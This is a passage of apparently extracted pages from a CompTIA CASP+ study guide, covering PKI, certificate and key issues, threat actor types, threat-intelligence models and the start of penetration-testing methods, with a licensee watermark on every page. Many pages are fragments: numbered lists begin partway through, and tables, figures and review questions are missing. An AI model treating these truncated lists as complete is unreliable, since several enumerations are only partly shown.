digital signature provides the client with a mechanism whereby the originator of
the software can be validated, this helps protect against forged software, such as
whereby an adversary provides a malicious “fake” update. Code signing provides
proof of origin; it does not provide insight into the quality of the software!
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
232 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Data at Rest
Data at rest identifies that the data is in some sort of persistent storage media.
Examples of types of data that may be at rest include financial information
stored in databases, archived audiovisual media, operational policies, and other
management documents, system configuration data, and more. In this state,
it is usually possible to encrypt the data, using techniques such as whole disk
encryption, database encryption, and file- or folder-level encryption. AES is an
example of a method to protect data at rest, on Microsoft Windows computers this
can be accomplished by using BitLocker. Another widely implemented example of
protecting data at rest includes more advanced methods of protecting operating
systems and firmware. Verified boot is often used in mobile and embedded devices
and describes the method by which these devices can verify the integrity of boot
firmware and software. This is accomplished by checking the firmware and software
using a copy of the associated public key that is permanently etched into the device.
On screen error message for an android device that failed the verified boot process.
(Screenshot courtesy of Google.)
Data in Transit
Data in transit (sometimes referred to as data in motion) is described as the state
when data is moved, for example data transmitted over a network. Examples of
data that may be in transit include website traffic, remote access traffic, data being
synchronized between cloud repositories, files moving between a client and server,
and more. TLS or IPSec are examples of methods designed to protect data in
transit. Another common application of protecting data in transit is through the use
of VPN. VPN protects data in motion but should also leverage PKI to verify that the
endpoints are trusted/pre-authorized prior to authentication.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 233
Data in Use
Data in use is the state when data is present in volatile memory, such as system
RAM or CPU registers and cache. Examples of types of data that may be in use
include documents open in a word processing application, database data that is
currently being modified, event logs being generated while an operating system
is running, and more. When a user works with data, that data usually needs to be
decrypted as it goes from in rest to in use. The data may stay decrypted for an
entire work session, which puts it at risk. However, trusted execution environment
(TEE) mechanisms, such as Intel Software Guard Extensions (software.intel.com/
content/www/us/en/develop/topics/software-guard-extensions/details.html), are
able to encrypt data as it exists in memory, so that an untrusted process cannot
decode the information.
Additional Information
Android Verified Boot
https://source.android.com/security/verifiedboot
Apple Secure Boot
https://support.apple.com/guide/security/boot-process-for-ios-and-ipados-devices-
secb3000f149/web
Secure Authentication
Secure Authentication describes the methods by which two entities authenticate in
a safe and protected manner. This requires the implementation of more advanced
“logon” techniques, often attributed to authentication, such as the ubiquitous
username and password. Secure authentication may completely do-away with
usernames and passwords or fortify them by adding in additional measures as is
established with multi-factor authentication. In terms of applications and devices
performing authentication, the use of cryptographic techniques plays a significant
role. For example, a server (or really any computer) can present a client certificate
to a server to identify that it is an authorized device. Additionally, public key
encryption can be incorporated to protect the communications between the two
endpoints after setting up the session. Device certificates are particularly useful
to limit and restrict access to web services and APIs. Instead of simply enabling a
web service or API to accept and respond to requests or to use simple username/
password schemes, it should be configured to require a certificate to identify
authorized endpoints and proceed to using public key encryption to protect the
session. Web services are gateways into applications and the data they process
represents valuable attack points as a result. Web services and APIs often contain
sensitive data and access to them must be strictly limited.
Smart card authentication describes programming cryptographic information
onto a card equipped with a secure processing chip. The chip stores the user’s
digital certificate, the private key associated with the certificate, and a personal
identification number (PIN) used to activate the card.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
234 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
3. The AS is able to decrypt the request because it has a matching public key and
trusts the user’s certificate, either because it was issued by a local certification
authority or by a third-party CA that is a trusted root CA.
4. The AS responds with the TGT and Ticket Granting Service (TGS) session key.
Federated PKI
A federated PKI describes a set of independent PKI hierarchies (each supporting
separate trust domains and each with its own root CA) that are defined by a
common set of policies that shape the trust relationships between them. A common
example of this is to create a bridge CA which acts as an intermediary between root
CAs and issues cross-certificates which define trust paths between the root CAs.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 235
Review Activity:
Objectives of Cryptography and Public
Key Infrastructure
3
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
236 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 10B
Implementing Appropriate
PKI Solutions
6
Public Key Infrastructure offers a wide variety of benefits. This topic seeks to better
understand the details of a PKI implementation and will explore the server and
software components in more detail. Additionally, this topic will explore some
practical applications of digital certificates, including additional web protections, the
concepts surrounding certificate management, and some examples of what can go
wrong from time to time. The topic ends with a summary of common certificate and
cryptographic key issues that are common in practical applications of PKI.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 237
• Ensure the validity of certificates and the identity of those applying for them
(registration).
• Establish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
• Manage the servers (repositories) that store and administer the certificates.
• Perform key and certificate life cycle management, notably revoking invalid
certificates.
Subordinate/Intermediate CA
In the hierarchical model, a single CA (called the root) issues certificates to several
intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end
entities). This model has the advantage that different intermediate CAs can be set up
with different certificate policies, enabling users to perceive clearly what a particular
certificate is designed for. Each leaf certificate can be traced back to the root CA along
the certification path. This is also referred to as certificate chaining, or a chain of trust.
The root’s certificate is self-signed. In the hierarchical model, the root is still a single
point of failure. If the root is damaged or compromised, the whole structure collapses.
To mitigate against this, however, the root server can be taken offline, as most of the
regular CA activities are handled by the intermediate CA servers.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
238 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
2. The public key that will be included in the certificate. The CA will take the
public certificate provided to it within the request and “endorse” or validate it.
3. Information about the key type and its length, for example RSA 2048.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 239
Domain validation certificate. Only the padlock is shown and the browser reports
that the owner is not verified. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
240 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Wildcard Certificates
A wildcard certificate is one that contains the wildcard character * in its domain
name field. This allows the certificate to be used for any number of subdomains.
Not to be confused with subject alternate name (SAN), wildcard certificates can only
be used for subdomains where a SAN can be used to specify a completely different
domain name. Wildcard certificates are particularly useful for SSL accelerators and
load balancers (LB) that provide the outward-facing component of a website. The
LB or accelerator can be configured to protect communications using the wildcard
certificate and successfully deliver content for any number of subdomain websites,
such as www.foo.com, webmail.foo.com, apps.foo.com, and any others. This
significantly reduces administrative burden as a single certificate can be configured
and setup one time to protect the traffic of many subdomains. Protecting wildcard
certificates is especially important for this same reason, one certificate wields
power over any number of subdomains.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 241
on the SSH server. The SSH server will challenge a connecting device to provide its
public key, which is subsequently checked against the local list.
Server authentication is utilized by a client device whereby the client can
establish that the server is genuine. A classic example of this is through web server
certificates, but device certificates can also be used for scenarios where a server is
being accessed by some means other than for web traffic. For example, a file server,
or even a wireless access point, which fulfills the role of server in a typical wireless
network.
Digital Signatures
Public key cryptography can authenticate a sender, because they control a private
key that encrypts messages in a way that no one else can. Public key cryptography
can only be used with very small messages, however. Hashing proves integrity by
computing a unique checksum from input. These two cryptographic functions can
be combined to authenticate a sender and prove the integrity of a message. This
usage is called a digital signature. The following process is used to create a digital
signature using RSA encryption:
• The sender (Alice) creates a digest of a message, using a pre-agreed hash
algorithm, such as SHA256, and then encrypts the digest using her private key.
• Alice attaches the digital signature to the original message and sends both the
signature and the message to Bob.
• Bob decrypts the signature using Alice’s public key, resulting in the original hash.
• Bob then calculates his own checksum for the document (using the same
algorithm as Alice) and compares it with Alice’s hash.
If the two hashes are the same, then the data has not been tampered with during
transmission, and Alice’s identity is guaranteed. If either the data had changed or a
malicious user (Mallory) had intercepted the message and used a different private
key, the digests would not match.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
242 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Code Signing
A code signing certificate is issued to a software publisher, following some sort
of identity check and validation process by the CA. The publisher then signs the
executables or DLLs that make up the program to guarantee the validity of a software
application or browser plug-in. Some types of scripting environments, such as
PowerShell, can also require valid digital signatures. The CN is set to an organization
name, such as “CompTIA Development Services, LLC,” rather than a FQDN.
Code signing is designed to provide a mechanism by which software can be
verified to come from a trusted source. The presence of a code signature does
not offer guarantees of code quality as it simply validates the originator. Verifying
the originator of software can help measure its trustworthiness and can be used
as a means to restrict software from running on a host, for example blocking
any unsigned software from running or specifying that only software from a pre-
defined set of signors can be used. As was seen in the 2020 SolarWinds incident, the
presence of a code signature only provides as much assurance as the organization
signing it (https://www.microsoft.com/security/blog/2020/12/18/analyzing-
solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-
how-microsoft-defender-helps-protect/).
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 243
Cross Certification
Cross certification describes when a certificate is used to establish a trust
relationship between two different certification authorities. This is accomplished by
having a CA in one hierarchy sign the public key of a CA located in another. Cross
certification can be a useful mechanism of integrating the public key infrastructure
built by two organizations that are combining resources, such as might occur
during an acquisition. Cross certification allows users and devices to be recognized
between both organizations regardless of which organization’s PKI was used to
generate the certificates. Without cross certification, users and devices from one
organization interacting with resources at the other will receive errors to the effect
of “trust cannot be established” or “untrusted connection” as the issuing CA is
not recognized. It can also be used as a method to build a new PKI and migrate
resources over to it in a controlled manner.
Trusted Providers
Trusted providers describe the set of root CAs that are trusted to validate
identity. Certificates signed by a trusted provider will in turn be trusted. Trusted
providers are pre-configured lists of CAs and are most often found stored within
modern browsers or within the configuration of the operating system. Trusted
providers can be expanded or reduced as appropriate. For organizations that
build their own PKI infrastructure, the root CA must be added to the list of
trusted providers in order for endpoints to recognize it without generating
warnings and errors on any of the certificates it has signed. The following
screenshot shows the list of trusted certificate authorities configured within
the Firefox browser. Notice the option to import, this allows the import of
certificates for additional CAs deemed trustworthy.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
244 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The following shows the output of the certmgr.msc tool on Microsoft Windows:
Certificate Profiles
Certificate profiles can be defined in several ways. First and foremost, a certificate
profile should define the set of certificates expected and allowed within an
organization. An example of this can be reviewed at the U.S. Federal Public Trust
(https://devicepki.idmanagement.gov/certificateprofiles/), where various types of
certificates and the attributes of each type are carefully described and defined.
Certificate profiles can also be defined via technical mechanisms, such as is the
case when certificates are packaged together for specific use-cases and deployed to
endpoints needing them to operate. A certificate profile can include certificates needed
for device authentication, email, and VPN access and deployed via Group Policies
(in Microsoft Windows environments) or via more advanced techniques and tools.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 245
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
246 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Phase Description
Monitor Uses mechanisms to identify changes to certificates
or any anomalous activity related to certificate use.
Of particular interest would be certificates with
unknown or self-signed origin as these may be
indicative of malicious or unauthorized activity.
Protect Specific measures to protect private keys, such as
the use of KEKs.
Renew Implements measures to identify any certificates
with pending expiration but more specifically
incorporates automation into the certificate
renewal process.
Revoke Implements measures to identify the need for
revocation, understanding the scope of impact
and the capabilities to publish to CRLs in a timely
manner.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 247
Certificate Stapling
Certificate stapling resolves these issues by having the SSL/TLS web server
periodically obtain a time-stamped OCSP response from the CA. When a client
submits an OCSP request, the web server returns the time-stamped response,
rather than making the client contact the OCSP responder itself.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
248 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Issue Description
Validity dates Certificates have validity periods defined by
issue and expiration dates. If a certificate is
provided that has an expired date, an error will
be generated.
Wrong certificate type This error is generated when a certificate
crafted for a particular use is used in a
different manner. For example, trying to use
a device certificate to authenticate a user.
Revoked certificates Certificates will be invalidated if they appear
on a CRL. Even if all fields of the certificate
are correct and the certificate is used for the
proper purposes, if it appears on a CRL, it will
not be accepted.
Incorrect name A certificate CN name must match the FQDN
of the system using it. For example, if a
certificate is issued to www.foo.com and
then the site is accessed via its IP address
the browser will notice that the address
used to access the site and the CN contained
within the certificate issued to it do not
match, generating an error.
Chain issues A certificate chain must be valid all the way
through the chain. The root, subordinate and
leaf certificates must all pass validity checks, if
one is bad then the chain is bad. For example,
if the root or subordinate, certificate expiration
date has passed, then any downstream
certificates will also be invalid.
Self-signed certificate A self-signed certificate is one generated
independently of a CA. Essentially like a
fake-ID, the information may be accurate, but
the certificate is not created/endorsed by a
trusted third party, resulting in errors.
Weak signing algorithm Symptoms often displayed as “your connection
is not private” by modern browsers.This error
identifies that a weak or deprecated hashing
algorithm has been specified.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 249
Issue Description
Weak cipher suite Commonly occurring when web server
software is upgraded but the website is
configured to use old or deprecated cipher
suites. Errors presented in browsers include
NS_ERROR_NET_INADEQUATE_SECURITY or
ERR_SPDY_INADEQUATE_TRANSPORT_SECURITY.
Reconfiguration of the website is needed to
remedy. For Internet Information Services
(IIS), the IIS Crypto tool can help identify and
disable weak cipher suites in the configuration.
IIS Crypto tool is available from https://www.
nartac.com/Products/IISCrypto/.
Incorrect permissions When a template is used for certificate
enrollment but the permissions are incorrectly
set on the template, then an error will occur
indicating that the “operation failed” or “cannot
enroll for this type of certificate.”
Cipher mismatches Symptoms often displayed as ERR_SSL_
VERSION_OR_CIPHER_MISMATCH. This error
can occur in modern browsers that identify old
and/or deprecated cipher suites and refuse
to use them.This error can also appear in old
operating systems and browsers that do not
support modern cipher suites.
Cryptographic keys can also be the source of many problems. The following
table identifies some common examples, concerns, and issues related to
cryptographic keys.
Issue Description
Mismatched If the wrong public/private key pair is used to
decrypt data. Errors such as “key mismatch” or
“X509_check_private_key” will be generated.
Improper key handling Keys require deliberate consideration regarding
how they are to be protected, specifically
private keys and symmetric keys. When keys
are improperly protected, such as insecure
storage, they should be assumed to be
breached and subsequently revoked and
replaced.
Embedded keys Keys etched into specialized cryptographic
storage chips and available as read-only.
Rekeying Describes the process by which session keys
are renegotiated during a communication
session. The session key is periodically
changed to limit the amount of data protected
using the same key. Rekeying is triggered by
the volume of traffic protected by an individual
key, as opposed to the amount of time it has
been used.
(continued)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
250 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Issue Description
Crypto shredding Describes the concept that destroying a
decryption key in essence destroys the data it
was designed to protect. Especially important
in cloud environments where methods available
to confidently destroy data is limited. This
technique depends upon assurance that the
data was never available in decrypted format
at any point in its life cycle, that the encryption
method was sufficiently secure, and that the
key is irrecoverably destroyed.
Cryptographic Using cryptographic techniques to transform
obfuscation protected data into an unreadable format.
For example, using bcrypt to transform a
password prior to storing it for later use and
retrieval. By obfuscating the password it can
be safely stored even if the obfuscated is
exposed. The Linux/etc/shadow file is a classic
example as it contains obfuscated passwords
for local users.
Key rotation Purposely changing keys on a periodic basis
to mitigate issues associated with brute force
attacks or unidentified key breach incidents.
Previous key must be revoked as part of the
rotation process.
Compromised/exposed Unauthorized access to a symmetric key or
keys private key. Exposed private key requires
associated certificate to be revoked as
warranted. Exposed keys must be replaced.
Any data protected with the exposed key
must be identified to help understand scope
of impact.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 251
Review Activity:
Appropriate PKI Solutions
7
3. What is another term to describe the requirement for both client and
server devices to use certificates to verify identity?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
252 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 10
Summary
6
This lesson explored the many uses of PKI and the digital certificates it can
generate. Digital certificates and public key encryption can be used to protect
web traffic, to authenticate servers and clients, to verify the source of software, to
authenticate users, and many other use-cases. PKI requires careful and deliberate
planning and protection to ensure that certificates are provided to authorized
users and devices and for authorized purposes. Through proper design and careful
implementation, many of the features and functionality of PKI can be automated
to avoid much of the extra administrative burden associated with generating and
renewing digital certificates. Many different types of issues are associated with
digital certificates, and gaining a familiarity with these issues can help identify
potential operational and security configuration problems.
Key Takeaways
• Public Key Infrastructure is comprised of well-known, publicly accessible CAs as
well as privately built ones.
• PKI signs, or endorses, keys generated on the systems they will be used.
• For a PKI CA to be trusted, its digital certificate must be stored on devices that
will come into contact with its certificates.
• Digital certificates contain many mandatory and optional fields and also store a
copy of the public key.
• The use of https only communications can be specified using HTTP Strict
Transport Security (HSTS) and is a better solution to https redirect.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 11
Understanding Threat and
Vulnerability Management Activities
1
LESSON INTRODUCTION
Building defensible architectures requires a comprehensive understanding of
the threats the architecture faces and the vulnerabilities contained within it.
Fortunately, there has been much work done to help in this endeavor, and this
lesson seeks to explore the technologies, strategies, and frameworks available to
help assess and design cyber defenses.
Although many organizations face the same broad attacks, some organizations face
attacks from very specific groups. Compounding this, the nature of work performed
by an organization deeply influences the types of threat groups they face. Analyzing
threat groups helps to identify the types of attacks common to each and the types
of vulnerabilities most likely to be exploited. This in turn provides information that
frames the assessment of vulnerabilities to help define a prioritized approach to
vulnerability remediation and the required elements of defensive cyber operations.
In short, defensive operations look different from one organization to another
based on the nature of their work and the skills and motivation of the groups
looking to attack them.
Lesson Objectives
In this lesson, you will:
• Explore intelligence collection and analysis.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
254 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 11A
Explore Threat and Vulnerability
Management Concepts
2
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 255
Both of these approaches help teams test and improve their skills and capabilities
and also force the interpretation and use of threat intelligence in a practical and
actionable way.
Threat Hunting
Threat hunting describes an assessment technique that utilizes insights gained
from threat intelligence to proactively discover IOCs present within the environment
using an “assume breach” mindset. A threat hunting project is likely to be led by
senior staff and include:
• Advisories and bulletins—threat hunting is a labor-intensive activity and so
needs to be performed with clear goals and resources. Threat hunting usually
proceeds according to some hypothesis of possible threat. Security bulletins
and advisories from vendors and security researchers about new TTPs and/or
vulnerabilities may be the trigger for establishing a threat hunt. For example, if
threat intelligence reveals that Windows desktops in many companies are being
infected with a new type of malware that is not being blocked by any current
malware definitions, a threat-hunting plan to locate/detect the malware will be
warranted.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
256 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Method Description
Deep Web Describes the set of unindexed and
otherwise hidden locations on the
Internet and is generally associated
with malicious activity and criminal
operations. By accessing or infiltrating
these locations, information regarding
current or pending adversarial activity,
as well as evidence of a data breach,
such as identifying copies of protected
information like credit card numbers
posted on a site associated with threat
actors, can be gathered.
Open-Source Intelligence (OSINT) Using publicly available information
sources to collect and analyze data
to be used from the perspective
of cybersecurity operations, or
specifically to address the needs of
a specific project or operation. The
potential sources of information are
very broad and the effectiveness of
OSINT is dependent upon the skills
and experience of the analyst. OSINT
tasks require the use of specialty tools
designed to aid in the collection and
analysis of data pulled from various
sources, such as social media, DNS,
website, search engines, and other
sources.
Human Intelligence (HUMINT) The collection of intelligence through
interactions with people.HUMINT
describes the collection of skills related
to understanding and influencing
people through direct contact.
Insider Threat
An insider threat arises from an actor who has been identified by the organization
and granted some sort of access. Within this group of internal threats, you
subdivide the threat to 1) insiders with permanent privileges, such as employees,
and 2) insiders with temporary privileges, such as contractors and guests.
An insider can be intentional or unintentional. An intentional insider is very much
aware of their actions and has a clear intent and goal. Unintentional insiders
cause damage through neglect or by being exploited by an outside attacker.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 257
Competitor
Most competitor-driven espionage is thought to be pursued by state actors, but it
is not inconceivable that a rogue business might use cyber espionage against its
competitors. Such attacks could aim at theft, disrupting a competitor’s business, or
damaging their reputation. Competitor attacks might be facilitated by employees
who have recently changed companies and bring an element of insider knowledge
with them.
Organized Crime
In many countries, cybercrime has overtaken physical crime both in terms
of number of incidents and losses. An organized crime gang can operate
across the Internet from different jurisdictions than its victims, increasing
the complexity of prosecution. Organized crime will seek any opportunity
for criminal profit, but typical activities are financial fraud (both against
individuals and companies) and blackmail. A blog from Security Intelligence
(securityintelligence.com/the-business-of-organized-cybercrime-rising-intergang-
collaboration-in-2018) discusses some of the strategies and tools used by
organized crime gangs.
Hacktivist
A hacktivist group, such as Anonymous, WikiLeaks, or LulzSec, uses cyberweapons
to promote a political agenda. Hacktivists might attempt to obtain and release
confidential information to the public domain, perform denial of service (DoS)
attacks, or deface websites. Political, media, and financial groups and companies
are probably most at risk, but environmental and animal advocacy groups may
target companies in a wide range of industries. Hacktivist groups can demonstrate
high levels of sophistication in their attacks but generally lack the level of funding
associated with organized crime and nation-state groups.
Nation-State
Most nation states have developed cybersecurity expertise and will use
cyber weapons to achieve both military and commercial goals. The security
company Mandiant’s APT1 report into Chinese cyberespionage units (fireeye.
com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf)
was hugely influential in shaping the language and understanding of modern
cyberattack life cycles. The term Advanced Persistent Threat (APT) was
coined to understand the behavior underpinning modern types of cyber
adversaries. Rather than think in terms of systems being infected with a virus
or Trojan, an APT refers to the ongoing ability of an adversary to compromise
network security—to obtain and maintain access—using a variety of tools and
techniques.
State actors have been implicated in many attacks, particularly on energy and
health network systems. The goals of state actors are primarily espionage and
strategic advantage, but it is not unknown for countries—North Korea being a good
example—to target companies purely for commercial gain.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
258 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Researchers such as FireEye report on the activities of organized crime and nation state actors.
(Screenshot used with permission from fireeye.com.)
State actors work separately from the national government, military, or security
service that sponsors and protects them, in order to maintain “plausible deniability”
of their actions. They are likely to pose as independent groups or even as
hacktivists. They may wage false flag campaigns that try to implicate other states
(media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/20151759/
KSB2019_APT-predictions-2020_web.pdf).
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 259
Similarly, an attacker can target a managed services organization that may have VPN
access to several valuable targets. Lastly, an attacker may target an equipment supplier
in order to insert malware, vulnerable hardware/software, or rogue components that
are assembled into the final product.
2. Capability
3. Infrastructure
4. Victim
The diamond model states that an adversary achieves goals by using a capability
over infrastructure against a victim. The diamond model visualizes this relationship
using a diamond to demonstrate that, from an analytic viewpoint, identifying any of
the features can lead an analyst to the other connected points.
Meta-features are included as ovals on the extended diamond model diagram and
describe the specific details that may be present in the base features. Additionally,
the meta-features technology and social-political describe the technology enabling
infrastructure and capabilities to interact and the relationship between the
adversary and victim.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
260 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
3. Delivery—The method by which the tool will be delivered, for example via
email
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 261
The steps identify several opportunities for the detection of adversarial action, with
the goal being to detect these activities as early in the kill chain as possible.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
262 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 263
Source Description
Advisories Advisories contains specific information
regarding an identified vulnerability and
is typically provided by the developer/
maintainer of the product via an official
channel, such as the vendor website.
Bulletins Bulletins are summary newsletter/
report type notices that contain a listing
of advisories across a wide variety of
products.
Information Sharing and Analysis Information Sharing and Analysis
Centers (ISACs) Centers are designed to support spe-
cific sectors of the economy. ISACs are
non-profit agencies that serve as central
resource to collect and disseminate
information to the sectors they support.
ISACs often provide support services
within their sectors. The National
Council of ISACs website is https://www.
nationalisacs.org/member-isacs-3
News Reports News articles and headlines often
provide information regarding
cybersecurity issues, including
information related to the methods
used that led to the incident occuring.
SCAP Languages
• Open Vulnerability and Assessment Language (OVAL)—Helps describe
three main aspects of an evaluated system including 1) system information,
2) machine state and, 3) reporting. Using OVAL provides a consistent and
interoperable way to collect and assess information regardless of the security
tools being used.
• Asset Reporting Format (ARF)—As the name suggests, ARF helps to correlate
reporting formats to asset information independently from any specific
application or vendor product for consistency and interoperability.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
264 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
SCAP Metrics
Common Vulnerability Scoring System (CVSS)—Represents a numerical score to
reflect the severity of a vulnerability. The score ranges from 0 - 10 with the following
qualitative ratings:
Details regarding the CVSS score for the CVE item CVE-2021-22893
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 265
Additional Information
Security Content Automation Protocol (SCAP)
https://csrc.nist.gov/projects/security-content-automation-protocol/
Extensible Configuration Checklist Description Format (XCCDF)
https://csrc.nist.gov/Projects/Security-Content-Automation-Protocol/Specifications/
xccdf
Open Vulnerability and Assessment Language (OVAL)
https://oval.mitre.org/
Common Platform Enumeration (CPE)
https://nvd.nist.gov/products/cpe
Common Vulnerabilities and Exposures (CVE)
https://cve.mitre.org/
Common Vulnerability Scoring System (CVSS)
https://www.first.org/cvss/
Common Configuration Enumeration (CCE)
https://nvd.nist.gov/config/cce/index
Asset Reporting Format (ARF)
https://csrc.nist.gov/Projects/Security-Content-Automation-Protocol/
Specifications/arf
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
266 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Threat and Vulnerability Management
Concepts
3
5. True or False. CPE is a list of records where each item contains a unique
identifier used to describe publicly known vulnerabilities.
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 267
Topic 11B
Explain Vulnerability and Penetration
Test Methods
6
Knowledge regarding the methods and approaches used by attackers, and the
vulnerabilities these things are designed to exploit can be used to evaluate the stance
of an organization. Using active measures to assess and measure the presence
of vulnerabilities in an enterprise environment expands beyond running simple
vulnerability assessment scans. While vulnerability assessment scans are an important
component to vulnerability assessment, more comprehensive and specialized
measures are also needed. Many additional vulnerability assessment tools should
be used, and many times the use of these tools forms the basis of a more assertive
and literal assessment, also known as a pen-test. Pen-tests are invasive by design
and, as a consequence, require careful scoping and planning prior to any work being
performed. The end result of vulnerability and pen-test evaluations is to identify
and rank weaknesses so that they can be addressed before an adversary discovers
them!
Lesson 11: Understanding Threat and Vulnerability Management Activities | Topic 11B
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
268 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Below is a better example. If the evaluation logic fails, then limited access is
granted, an example of a fail-safe:
if admin == true
(**privileged access**)
else (**limited access**)
Additionally, reviewing network and data flow diagrams and configuration files
can expose vulnerabilities. Assuming that diagrams are complete and up to date,
reviewing these plans can expose vulnerabilities that might not be apparent using
other techniques. Some examples might include identifying wireless access points
in troublesome locations, data interfaces, or external access points to systems and
applications. In the case of configuration files, many times usernames, passwords,
and encryption keys can be discovered there.
Dynamic Analysis
Dynamic analysis includes using vulnerability scanning software to identify
vulnerabilities and, in a more vigorous approach, penetration testing. A dynamic
